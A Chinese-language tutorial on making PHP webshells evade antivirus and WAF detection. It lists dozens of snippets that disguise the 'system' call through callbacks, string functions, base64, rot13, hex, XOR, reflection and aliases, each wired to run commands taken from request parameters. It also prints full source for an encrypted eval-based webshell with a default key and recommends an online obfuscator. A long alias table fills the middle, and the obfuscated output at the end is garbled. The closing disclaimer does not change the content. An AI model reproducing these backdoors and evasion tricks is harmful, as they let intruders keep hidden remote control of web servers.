基础学习
可变参数
-
$_GET
-
$_POST
-
$_COOKIE
-
$_REQUEST
-
$_SERVER
其中的某些参数可控,如REQUESTMETHOD,QUERYSTRING,HTTPUSERAGENT等 -
session_id() 这个比较特殊,但是依然可以利用
-
$_FILE
-
$GLOBALS
-
getallheaders()
-
get_defined_vars()
-
get_defined_functions()
filter_input
<?php
function abcsmytqqe($a){
$class_name = json_decode('"' . $a . '"');
((__FUNCTION__)[3].(__FUNCTION__)[5].(__FUNCTION__)[3].(__FUNCTION__)[6].(__FUNCTION__)[9].(__FUNCTION__)[4])($class_name);
}
$res=filter_input(INPUT_GET, 'b', FILTER_CALLBACK,array('options' => 'abcsmytqqe'));
回调函数
有太多了
call_user_func()
array_filter()
array_walk()
array_map()
registregister_shutdown_function()
register_tick_function()
filter_var()
filter_var_array()
uasort()
uksort()
array_reduce()
array_walk()
array_walk_recursive()
call_user_func&call_user_func_array
<?php
call_user_func('system', ('whoami'));
//相当于system('whoami')
<?php
call_user_func_array('system', array('whoami'));
array_map()
array_map()
函数将用户自定义函数作用到数组中的每个值上,并返回用户自定义函数作用后的带有新的值的数组
用到命令执行中就是
array_map('system', array('whoami'));
array_map($_GET['a'], array('whoami'));
array_map('system', array($_GET['a']));
array_walk&array_walk_recursive
这个函数和我们的array_map是一样的
还可以拼接绕过关键字,因为我们传入的函数是使用String传入的
<?php
$a=array("who"."ami");
array_walk_recursive($a,'sys'.'tem');
array_filter
array_filter — 使用回调函数过滤数组的元素
<?php
$a=array("who"."ami");
array_filter ($a,'sys'.'tem');
iterator_apply
iterator_apply — 为迭代器中每个元素调用函数
<?php
$it = new ArrayIterator(array(1,2,3));
iterator_apply($it, "system",array("whoami"));
?>
ljl\86135
ljl\86135
ljl\86135
foreach()
<?php
$a=array("whoami");
$b="sys"."tem";
foreach($a as $value){
$b($value);
}
但是动态拼接很容易就被检测了
字符串处理类函数
稀奇古怪的算法
<?php
function confusion($a){
$s = ['A','a','b', 'y', 's', 's', 'T', 'e', 'a', 'm'];
$tmp = "";
while ($a>10) {
$tmp .= $s[$a%10];
$a = $a/10;
}
return $tmp.$s[$a];
}
confusion(976534)("whoami"); //confusion(976534)-->sysTem(高危函数)
这个是看的https://xz.aliyun.com/t/13591
<?php
function confusion($a){
$tmp = "";
// 新的算法逻辑
$characters = ['s', 'y', 's', 't', 'e', 'm'];
$indices = [0, 1, 0, 3, 4, 5]; // 对应 'system' 在 $characters 中的位置
foreach ($indices as $index) {
$tmp .= $characters[$index];
}
return $tmp;
}
// 验证结果
echo confusion(976534); // 输出 'system'
?>
String函数
trim() //从字符串的两端删除空白字符和其他预定义字符
ucfirst() //把字符串中的首字符转换为大写
ucwords() //把字符串中每个单词的首字符转换为大写
strtoupper() //把字符串转换为大写
strtolower() //把字符串转换为小写
strtr() //转换字符串中特定的字符
substr_replace() //把字符串的一部分替换为另一个字符串
substr() //返回字符串的一部分
如果$a();会判定为动态函数执行
<?php
$a="system";
strtoupper($a)("whoami");
这样strtoupper就会处理为String
pack()&unpack
pack()
函数函数把数据装入一个二进制字符串
Demo:简单来说,就是将指定编码的数字转成字符串
<?php
// ASCII 编码转换为 system
echo pack("C6", 115, 121, 115, 116, 101, 109); // s, y, s, t, e, m
echo pack("H*", "73797374656d"); // 73797374656d 对应的 ASCII 字符串是 system
?>
文件写入类函数
在Webshell的免杀过程中,一部分人另辟蹊径:通过执行一个执行内容为”写入恶意PHP“的样本来绕过查杀,执行成功后会在指定目录写入一个恶意PHP文件,最后通过连接那个恶意PHP文件获得WebShell
fwrite()&fputs
<?php
highlight_file(__FILE__);
error_reporting(0);
$file = fopen("flag.txt","w");
echo fwrite($file,"<?php phpinfo();"); //21
fclose($file);
fputs
是fwrite
的别名,可以用来写文件
file_put_contents()
<?php
highlight_file(__FILE__);
error_reporting(0);
$file =("flag.txt");
file_put_contents($file,"<?php phpinfo();"); //21
使用 FILE_APPEND
标记,可以在文件末尾追加内容
$file = 'sites.txt';
$site = "\nGoogle";
file_put_contents($file, $site, FILE_APPEND);
同时该函数可以配合解密函数写入文件,比如:
$datatest = "[文件的base64编码]";
file_put_contents('./要写入的文件名', base64_decode($datatest));
异常处理类函数
__construct //异常构造函数
getMessage //获取异常消息内容
getPrevious //返回异常链中的前一个异常,如果不存在则返回null值
getCode //获取异常代码
getFile //获取发生异常的程序文件名称
getLine //获取发生异常的代码在文件中的行号
getTrace //获取异常追踪信息,其返回值是一个数组
getTraceAsString //获取字符串类型的异常追踪信息
<?php
function check($a)
{
if($a!=1)
{
throw new Exception("sys"."tem");
}
return true;
}
try
{
check(8);
// 如果抛出异常,以下文本不会输出
echo '如果输出该内容,说明 $number 变量小于1';
}
// 捕获异常
catch(Exception $e){
$e->getMessage()("wh"."oami");
}
php特性
PHP数字可与字符做运算
<?php
$a="system";
1-$a("whoami")-2;
?>
变量混淆
<?php
$a="aaa";
$$a="system"; //$aaa=system
$aaa("whoami");
编码运算绕过
Base64编码
<?php
$f = base64_decode("c3lz__dG__Vt"); //解密后为system高危函数,中间可以加入_
$f($_POST[0]); //system($_POST[0]);
?>
ASCII编码
ascii对应的是chr函数解密
<?php
$f = chr(115).chr( 121).chr(115).chr(116).chr(101).chr(109);//system
$f($_POST['0']);
?>
ROT13编码
<?php
$f = str_rot13("flfgrz"); // 解密后为system,高危函数
$f($_POST[0]); // system($_POST[0]);
?>
Hex编码
<?php
$f = hex2bin("73797374656d"); // 解密后为system,高危函数
$f($_POST[0]); // system($_POST[0]);
?>
Gz压缩编码
<?php
$f = gzuncompress(base64_decode("eJzLSM3JyVcozy_KSVEEABxJBD4=")); // 解压缩后为system,高危函数
$f($_POST[0]); // system($_POST[0]);
?>
组合编码
可以组合使用多种编码方式来增加复杂性。
<?php
$f = base64_decode(hex2bin("73797374656d")); // 首先进行hex解码,然后base64解码,最终解密为system,高危函数
$f($_POST[0]); // system($_POST[0]);
?>
自定义编码
<?php
function custom_decode($str) {
$encoded = str_replace(['a','d'], ['s', 'e'], $str);
return ($encoded);
}
$f = custom_decode("ayatdm"); // 解密后为system,高危函数
echo $f;
?>
异或
<?php
$a = ('.'^']').('$'^']').('.'^']').('4'^'@').('8'^']').(']'^'0'); //system
$b = ('.$.48]' ^ ']]]@]0');//system
echo $a;
echo $b;
读取字符串绕过
ReflectionClass::getDocComment
/**
* system($_GET[aabyss]);
*/
class User { }
$user = new ReflectionClass('User');
$comment = $user->getDocComment();
$f = substr($comment , 14 , 22);
eval($f);
读取数据库
$path = "数据库文件名"
$db = new PDO("sqlite:" . $path);
$sql_stmt = $db->prepare('select * from test where name="system"');
$sql_stmt->execute();
$f = substr($sql_stmt->queryString, -7, 6);
$f($_GET['b']);
读取目录
FilesystemIterator
是一个迭代器,可以获取到目标目录下的所有文件信息
但是需要写一个特殊的文件
<?php
$fi = new FilesystemIterator(dirname(__FILE__));
$f = '';
foreach($fi as $i){
$a=substr($i,26,6);
if ($a=="system"){
$f=$a;
}
}
$f("whoami");
别名绕过
bzwrite->fwrite
bzflush->fflush
bzclose->fclose
isId->dom_attr_is_id
substringData->dom_characterdata_substring_data
appendData->dom_characterdata_append_data
insertData->dom_characterdata_insert_data
deleteData->dom_characterdata_delete_data
replaceData->dom_characterdata_replace_data
createElement->dom_document_create_element
createDocumentFragment->dom_document_create_document_fragment
createTextNode->dom_document_create_text_node
createComment->dom_document_create_comment
createCDATASection->dom_document_create_cdatasection
createProcessingInstruction->dom_document_create_processing_instruction
createAttribute->dom_document_create_attribute
createEntityReference->dom_document_create_entity_reference
getElementsByTagName->dom_document_get_elements_by_tag_name
importNode->dom_document_import_node
createElementNS->dom_document_create_element_ns
createAttributeNS->dom_document_create_attribute_ns
getElementsByTagNameNS->dom_document_get_elements_by_tag_name_ns
getElementById->dom_document_get_element_by_id
adoptNode->dom_document_adopt_node
normalizeDocument->dom_document_normalize_document
renameNode->dom_document_rename_node
save->dom_document_save
saveXML->dom_document_savexml
validate->dom_document_validate
xinclude->dom_document_xinclude
saveHTML->dom_document_save_html
saveHTMLFile->dom_document_save_html_file
schemaValidate->dom_document_schema_validate_file
schemaValidateSource->dom_document_schema_validate_xml
relaxNGValidate->dom_document_relaxNG_validate_file
relaxNGValidateSource->dom_document_relaxNG_validate_xml
setParameter->dom_domconfiguration_set_parameter
getParameter->dom_domconfiguration_get_parameter
canSetParameter->dom_domconfiguration_can_set_parameter
handleError->dom_domerrorhandler_handle_error
item->dom_domimplementationlist_item
getDomimplementation->dom_domimplementationsource_get_domimplementation
getDomimplementations->dom_domimplementationsource_get_domimplementations
item->dom_domstringlist_item
getAttribute->dom_element_get_attribute
setAttribute->dom_element_set_attribute
removeAttribute->dom_element_remove_attribute
getAttributeNode->dom_element_get_attribute_node
setAttributeNode->dom_element_set_attribute_node
removeAttributeNode->dom_element_remove_attribute_node
getElementsByTagName->dom_element_get_elements_by_tag_name
getAttributeNS->dom_element_get_attribute_ns
setAttributeNS->dom_element_set_attribute_ns
removeAttributeNS->dom_element_remove_attribute_ns
getAttributeNodeNS->dom_element_get_attribute_node_ns
setAttributeNodeNS->dom_element_set_attribute_node_ns
getElementsByTagNameNS->dom_element_get_elements_by_tag_name_ns
hasAttribute->dom_element_has_attribute
hasAttributeNS->dom_element_has_attribute_ns
setIdAttribute->dom_element_set_id_attribute
setIdAttributeNS->dom_element_set_id_attribute_ns
setIdAttributeNode->dom_element_set_id_attribute_node
getNamedItem->dom_namednodemap_get_named_item
setNamedItem->dom_namednodemap_set_named_item
removeNamedItem->dom_namednodemap_remove_named_item
item->dom_namednodemap_item
getNamedItemNS->dom_namednodemap_get_named_item_ns
setNamedItemNS->dom_namednodemap_set_named_item_ns
removeNamedItemNS->dom_namednodemap_remove_named_item_ns
count->dom_namednodemap_count
getName->dom_namelist_get_name
getNamespaceURI->dom_namelist_get_namespace_uri
insertBefore->dom_node_insert_before
replaceChild->dom_node_replace_child
removeChild->dom_node_remove_child
appendChild->dom_node_append_child
hasChildNodes->dom_node_has_child_nodes
cloneNode->dom_node_clone_node
normalize->dom_node_normalize
isSupported->dom_node_is_supported
hasAttributes->dom_node_has_attributes
compareDocumentPosition->dom_node_compare_document_position
isSameNode->dom_node_is_same_node
lookupPrefix->dom_node_lookup_prefix
isDefaultNamespace->dom_node_is_default_namespace
lookupNamespaceUri->dom_node_lookup_namespace_uri
isEqualNode->dom_node_is_equal_node
getFeature->dom_node_get_feature
setUserData->dom_node_set_user_data
getUserData->dom_node_get_user_data
item->dom_nodelist_item
count->dom_nodelist_count
findOffset16->dom_string_extend_find_offset16
findOffset32->dom_string_extend_find_offset32
splitText->dom_text_split_text
isWhitespaceInElementContent->dom_text_is_whitespace_in_element_content
isElementContentWhitespace->dom_text_is_whitespace_in_element_content
replaceWholeText->dom_text_replace_whole_text
handle->dom_userdatahandler_handle
registerNamespace->dom_xpath_register_ns
query->dom_xpath_query
evaluate->dom_xpath_evaluate
registerPhpFunctions->dom_xpath_register_php_functions
ftp_quit->ftp_close
imap_header->imap_headerinfo
imap_listmailbox->imap_list
imap_getmailboxes->imap_list_full
imap_scanmailbox->imap_listscan
imap_listsubscribed->imap_lsub
imap_getsubscribed->imap_lsub_full
imap_fetchtext->imap_body
imap_scan->imap_listscan
imap_create->imap_createmailbox
imap_rename->imap_renamemailbox
ldap_close->ldap_unbind
ldap_get_values->ldap_get_values_len
ldap_modify->ldap_mod_replace
mysqli_execute->mysqli_stmt_execute
mysqli_escape_string->mysqli_real_escape_string
mysqli_set_opt->mysqli_options
autocommit->mysqli_autocommit
begin_transaction->mysqli_begin_transaction
change_user->mysqli_change_user
character_set_name->mysqli_character_set_name
close->mysqli_close
commit->mysqli_commit
connect->mysqli_connect
dump_debug_info->mysqli_dump_debug_info
debug->mysqli_debug
get_charset->mysqli_get_charset
get_client_info->mysqli_get_client_info
get_client_info->mysqli_get_client_info
get_connection_stats->mysqli_get_connection_stats
get_server_info->mysqli_get_server_info
get_warnings->mysqli_get_warnings
init->mysqli_init_method
kill->mysqli_kill
multi_query->mysqli_multi_query
construct->mysqli_link_construct
more_results->mysqli_more_results
next_result->mysqli_next_result
options->mysqli_options
ping->mysqli_ping
prepare->mysqli_prepare
query->mysqli_query
real_connect->mysqli_real_connect
real_escape_string->mysqli_real_escape_string
escape_string->mysqli_real_escape_string
real_query->mysqli_real_query
release_savepoint->mysqli_release_savepoint
rollback->mysqli_rollback
savepoint->mysqli_savepoint
select_db->mysqli_select_db
set_charset->mysqli_set_charset
set_opt->mysqli_options
ssl_set->mysqli_ssl_set
stat->mysqli_stat
stmt_init->mysqli_stmt_init
store_result->mysqli_store_result
thread_safe->mysqli_thread_safe
use_result->mysqli_use_result
refresh->mysqli_refresh
construct->mysqli_result_construct
close->mysqli_free_result
free->mysqli_free_result
data_seek->mysqli_data_seek
fetch_field->mysqli_fetch_field
fetch_fields->mysqli_fetch_fields
fetch_field_direct->mysqli_fetch_field_direct
fetch_all->mysqli_fetch_all
fetch_array->mysqli_fetch_array
fetch_assoc->mysqli_fetch_assoc
fetch_object->mysqli_fetch_object
fetch_row->mysqli_fetch_row
field_seek->mysqli_field_seek
free_result->mysqli_free_result
construct->mysqli_stmt_construct
attr_get->mysqli_stmt_attr_get
attr_set->mysqli_stmt_attr_set
bind_param->mysqli_stmt_bind_param
bind_result->mysqli_stmt_bind_result
close->mysqli_stmt_close
data_seek->mysqli_stmt_data_seek
execute->mysqli_stmt_execute
fetch->mysqli_stmt_fetch
get_warnings->mysqli_stmt_get_warnings
result_metadata->mysqli_stmt_result_metadata
more_results->mysqli_stmt_more_results
next_result->mysqli_stmt_next_result
num_rows->mysqli_stmt_num_rows
send_long_data->mysqli_stmt_send_long_data
free_result->mysqli_stmt_free_result
reset->mysqli_stmt_reset
prepare->mysqli_stmt_prepare
store_result->mysqli_stmt_store_result
get_result->mysqli_stmt_get_result
oci_free_cursor->oci_free_statement
ocifreecursor->oci_free_statement
ocibindbyname->oci_bind_by_name
ocidefinebyname->oci_define_by_name
ocicolumnisnull->oci_field_is_null
ocicolumnname->oci_field_name
ocicolumnsize->oci_field_size
ocicolumnscale->oci_field_scale
ocicolumnprecision->oci_field_precision
ocicolumntype->oci_field_type
ocicolumntyperaw->oci_field_type_raw
ociexecute->oci_execute
ocicancel->oci_cancel
ocifetch->oci_fetch
ocifetchstatement->oci_fetch_all
ocifreestatement->oci_free_statement
ociinternaldebug->oci_internal_debug
ocinumcols->oci_num_fields
ociparse->oci_parse
ocinewcursor->oci_new_cursor
ociresult->oci_result
ociserverversion->oci_server_version
ocistatementtype->oci_statement_type
ocirowcount->oci_num_rows
ocilogoff->oci_close
ocilogon->oci_connect
ocinlogon->oci_new_connect
ociplogon->oci_pconnect
ocierror->oci_error
ocifreedesc->oci_free_descriptor
ocisavelob->oci_lob_save
ocisavelobfile->oci_lob_import
ociwritelobtofile->oci_lob_export
ociloadlob->oci_lob_load
ocicommit->oci_commit
ocirollback->oci_rollback
ocinewdescriptor->oci_new_descriptor
ocisetprefetch->oci_set_prefetch
ocipasswordchange->oci_password_change
ocifreecollection->oci_free_collection
ocinewcollection->oci_new_collection
ocicollappend->oci_collection_append
ocicollgetelem->oci_collection_element_get
ocicollassignelem->oci_collection_element_assign
ocicollsize->oci_collection_size
ocicollmax->oci_collection_max
ocicolltrim->oci_collection_trim
load->oci_lob_load
tell->oci_lob_tell
truncate->oci_lob_truncate
erase->oci_lob_erase
flush->oci_lob_flush
setbuffering->ocisetbufferinglob
getbuffering->ocigetbufferinglob
rewind->oci_lob_rewind
read->oci_lob_read
eof->oci_lob_eof
seek->oci_lob_seek
write->oci_lob_write
append->oci_lob_append
size->oci_lob_size
writetofile->oci_lob_export
export->oci_lob_export
import->oci_lob_import
writetemporary->oci_lob_write_temporary
close->oci_lob_close
save->oci_lob_save
savefile->oci_lob_import
free->oci_free_descriptor
append->oci_collection_append
getelem->oci_collection_element_get
assignelem->oci_collection_element_assign
assign->oci_collection_assign
size->oci_collection_size
max->oci_collection_max
trim->oci_collection_trim
free->oci_free_collection
odbc_do->odbc_exec
odbc_field_precision->odbc_field_len
openssl_free_key->openssl_pkey_free
openssl_get_privatekey->openssl_pkey_get_private
openssl_get_publickey->openssl_pkey_get_public
pcntl_errno->pcntl_get_last_error
pg_exec->pg_query
pg_getlastoid->pg_last_oid
pg_cmdtuples->pg_affected_rows
pg_errormessage->pg_last_error
pg_numrows->pg_num_rows
pg_numfields->pg_num_fields
pg_fieldname->pg_field_name
pg_fieldsize->pg_field_size
pg_fieldtype->pg_field_type
pg_fieldnum->pg_field_num
pg_fieldprtlen->pg_field_prtlen
pg_fieldisnull->pg_field_is_null
pg_freeresult->pg_free_result
pg_result->pg_fetch_result
pg_loreadall->pg_lo_read_all
pg_locreate->pg_lo_create
pg_lounlink->pg_lo_unlink
pg_loopen->pg_lo_open
pg_loclose->pg_lo_close
pg_loread->pg_lo_read
pg_lowrite->pg_lo_write
pg_loimport->pg_lo_import
pg_loexport->pg_lo_export
pg_clientencoding->pg_client_encoding
pg_setclientencoding->pg_set_client_encoding
pg_clientencoding->pg_client_encoding
pg_setclientencoding->pg_set_client_encoding
posix_errno->posix_get_last_error
session_commit->session_write_close
snmpwalkoid->snmprealwalk
snmp_set_oid_numeric_print->snmp_set_oid_output_format
socket_getopt->socket_get_option
socket_setopt->socket_set_option
sodium_crypto_scalarmult_base->sodium_crypto_box_publickey_from_secretkey
join->implode
chop->rtrim
strchr->strstr
srand->mt_srand
getrandmax->mt_getrandmax
show_source->highlight_file
ini_alter->ini_set
checkdnsrr->dns_check_record
getmxrr->dns_get_mx
doubleval->floatval
is_integer->is_int
is_long->is_int
is_double->is_float
fputs->fwrite
set_file_buffer->stream_set_write_buffer
socket_set_blocking->stream_set_blocking
stream_register_wrapper->stream_wrapper_register
stream_register_wrapper->stream_wrapper_register
socket_set_timeout->stream_set_timeout
dir->getdir
is_writeable->is_writable
diskfreespace->disk_free_space
pos->current
sizeof->count
key_exists->array_key_exists
close->closedir
rewind->rewinddir
importStylesheet->xsl_xsltprocessor_import_stylesheet
transformToDoc->xsl_xsltprocessor_transform_to_doc
transformToUri->xsl_xsltprocessor_transform_to_uri
transformToXml->xsl_xsltprocessor_transform_to_xml
setParameter->xsl_xsltprocessor_set_parameter
getParameter->xsl_xsltprocessor_get_parameter
removeParameter->xsl_xsltprocessor_remove_parameter
hasExsltSupport->xsl_xsltprocessor_has_exslt_support
registerPHPFunctions->xsl_xsltprocessor_register_php_functions
setProfiling->xsl_xsltprocessor_set_profiling
setSecurityPrefs->xsl_xsltprocessor_set_security_prefs
getSecurityPrefs->xsl_xsltprocessor_get_security_prefs
gzrewind->rewind
gzclose->fclose
gzeof->feof
gzgetc->fgetc
gzgets->fgets
DEP_FALIAS(gzgetss->fgetss
gzread->fread
gzpassthru->fpassthru
gzseek->fseek
gztell->ftell
gzwrite->fwrite
gzputs->fwrite
getallheaders->apache_request_headers
getallheaders->litespeed_request_headers
apache_request_headers->litespeed_request_headers
apache_response_headers->litespeed_response_headers
我们就可以找到可以利用的函数mbereg_replace,这个函数是pregreplace的别名,mberegreplace与pregreplace类似,可以利用e模式隐式执行代码,但是mberegreplace无法逃过查杀,而mberegreplace则是ALLKILL,没错,只是一个*的差别,让他逃过了免杀的眼睛
<?php
// (ALLKILL)
error_reporting(0);
mbereg_replace('.*', '', $_REQUEST[2333], 'mer');//php5 php7 success
?>
另外,我们可以自己创造别名,如:
<?php
// PHP >=5.6 可过盾狗
use function \system as strlen; // 配合文件包含这甚至可以实现劫持,留待你们开发
strlen($_POST[1]);
<?php
// (ALLKILL)
define("ARRAY2", "sys"."tem");
@constant("ARRAY2")(pos(pos($GLOBALS))); // PHP>7
混淆
推荐网站
https://enphp.djunny.com/
把你的马子上传,然后混淆一手
原代码
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
混淆后
<?php
/*
-- EnPHP v2: http://enphp.djunny.com/
*/goto Ϻ��;����:$Ċ��=$�˼�[0x001];goto ���;��
免费获取网安资料:
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关